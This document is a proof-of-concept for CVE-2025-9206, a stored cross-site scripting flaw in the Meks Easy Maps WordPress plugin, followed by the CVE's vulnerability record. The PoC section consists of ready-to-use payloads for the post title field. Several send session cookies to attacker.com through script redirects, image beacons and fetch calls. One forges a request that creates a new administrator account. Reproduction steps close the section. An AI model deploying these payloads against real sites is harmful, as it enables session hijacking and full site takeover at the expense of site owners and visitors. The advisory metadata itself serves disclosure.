CVE-2025-9206

<!-- Stored XSS PoC for CVE-2025-9206 --> <!-- Inject the following payload into the post title field when creating/editing a post as a Contributor-level user --> <!-- Payload 1: Basic cookie stealing --> <script>document.location='https://attacker.com/steal?cookie='+document.cookie</script> <!-- Payload 2: Using img tag onerror event (bypasses some filters) --> <img src=x onerror="var i=new Image();i.src='https://attacker.com/log?d='+btoa(document.cookie+'|'+document.domain);"> <!-- Payload 3: Using SVG with onload (useful if <script> tags are filtered) --> <svg/onload="fetch('https://attacker.com/x?'+document.cookie)"> <!-- Payload 4: Stealing admin session and creating new admin user --> <script> var xhr = new XMLHttpRequest(); xhr.open('POST', '/wp-admin/user-new.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('action=createuser&_wpnonce_create-user='+document.querySelector('#_wpnonce_create-user').value+'&user_login=hacker&[email protected]&pass1=Password123!&pass2=Password123!&role=administrator'); </script> <!-- Steps to reproduce: 1. Login as Contributor or higher 2. Create a new post with the malicious title above 3. Associate the post with a Meks Easy Maps map marker 4. Publish or submit for review 5. When any user (especially admin) views the page with the map, the script executes -->

{"cve": {"id": "CVE-2025-9206", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:47.070", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Meks Easy Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the post title field in all version up to, and including, 2.1.4. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the map containing the malicious post."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/meks-easy-maps/trunk/inc/helpers.php#L419", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/meks-easy-maps/trunk/public/js/main-osm.js#L144", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8746b363-f1c2-42cb-83cf-639ab4102a50?source=cve", "source": "[email protected]"}]}}